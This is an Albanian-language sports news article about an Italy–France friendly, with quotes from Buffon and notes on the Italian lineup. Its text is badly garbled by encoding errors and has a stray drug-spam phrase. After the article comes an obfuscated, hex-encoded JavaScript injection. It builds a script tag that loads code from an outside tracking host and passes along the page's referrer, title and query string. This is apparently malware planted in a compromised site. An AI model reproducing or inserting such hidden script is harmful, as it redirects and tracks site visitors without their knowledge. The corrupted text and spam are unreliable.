f1_14-iqesore-sp1352880338

Itali – FrancA�, kryendeshja e miqA�soreve

generic zovirax tablets. A�farA�do ndeshjeje ndA�rmjet PA�rfaqA�sueses sA� ItalisA� dhe asaj tA� FrancA�s ka njA� “shije tA� veA�antA�”, ka thA�nA� kapiteni i “azzurA�ve”, Gianluigi Buffon, nA� prag tA� duelit miqA�sor. Italia dhe Franca do tA� ndeshen tA� mA�rkurA�n (20:45) nA� stadiumin “Ennio Tardini” tA� ParmA�s.

“Franca mbetet njA� shtet i fortA� nA� futbollin e EvropA�s dhe A�shtA� njA� ekip qA� gjithmonA� A�shtA� nA� gjendje tA� luajA� futboll tA� nivelit mA� tA� lartA�”, tha Buffon. “TA� luash kundA�r FrancA�s A�shtA� sikur tA� luash nA� njA� derbi tA� vA�rtetA�”.

Finalistja e mposhtur e “Euro 2012” Italia, me gjithA� fitoret nA� kampanjA�n kualifikuese pA�r BotA�rorin “Brazili 2014” ndaj MaltA�s, ArmenisA� e DanimarkA�s, nuk ka impresionuar me lojA�.

Ekipit tA� seleksionuesit Cesare Prandelli pA�r kA�tA� ndeshje do t’i mungojA� Daniele de Rossi, i cili u la jashtA� ekipit pA�r shkak se e qA�lloi me shuplakA� Stefano Maurin nA� derbin mes Lazios dhe RomA�s, tA� zhvilluar fundjavA�n e shkuar. De Rossin pritet ta zA�vendA�sojA� Emanuele Giaccherini, i cili do tA� luajA� pA�rkrah bashkA�lojtarA�ve tA� Juventusit, Claudio Marchisio e Andrea Pirlo. Mesfusha do tA� pA�rbA�het edhe nga Riccardo Montolivo i Milanit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}